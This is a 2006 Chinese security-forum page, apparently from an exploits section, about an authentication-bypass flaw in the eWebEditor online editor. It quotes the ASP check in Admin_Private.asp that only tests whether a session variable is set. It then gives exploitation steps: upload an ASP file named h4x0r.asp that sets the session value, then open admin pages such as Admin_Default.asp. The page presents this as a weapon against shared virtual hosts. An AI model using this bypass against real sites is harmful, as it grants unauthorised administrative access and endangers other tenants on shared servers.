奇趣技术网 收藏本站
设为主页
商务合作
首页 新闻中心 行业动态 软件新闻 安全资讯 病毒预警 漏洞发布 操作系统 Dos Win9x Win2000 WinXP Win2003 WinVista Linux Unix
数据库 DB2 Access MSSQL MySQL Oracle Sybase 编程技术 ASP PHP JSP CGI/Perl XML .Net C/C++/C# VB VC Delphi Java 汇编
安全技术 安全教学 工具介绍 漏洞利用 病毒防范 入侵检测 防火墙 安全防范 汉化破解 攻击实例 加密解密 技术论坛
中华网络安全联盟 >> 安全技术 >> 漏洞利用 >> eWebEditor session欺骗漏洞
安全技术
安全资讯
病毒预警
漏洞发布
安全教学
工具介绍
漏洞利用
病毒防范
入侵检测
防火墙
安全防范
汉化破解
攻击实例
加密解密
  • 动网论坛刷分刷经验漏

  • NOWA simple gallery存

  • eWebEditor session欺

  • 研究桃源留言本的漏洞

  • windows常见漏洞分析

  • 老兵新传-各种漏洞的利

  • 黑客利用Ms05002溢出找

  • 密码一网打尽 危机重重

    		•
    eWebEditor session欺骗漏洞
    字体:

    中华网络安全联盟    作者:佚名    来源:网络    时间:2006-3-19

    eWebEditor在线编辑器
    漏洞文件:Admin_Private.asp
    漏洞语句:<%

    If Session("eWebEditor_User") = "" Then
    Response.Redirect "admin_login.asp"
    Response.End
    End If

    只判断了session,没有判断cookies和路径的验证问题。
    漏洞利用:
    新建一个h4x0r.asp内容如下:
    <%Session("eWebEditor_User") = "11111111"%>
    访问h4x0r.asp,再访问后台任何文件,for example:Admin_Default.asp

    漏洞影响:虚拟主机的克星.
    字体:
     
    设为主页 收藏本站 联系我们 友情连接 商务合作 网友留言
    Copyright©2006-2008 中华网络安全联盟 All rights reserved.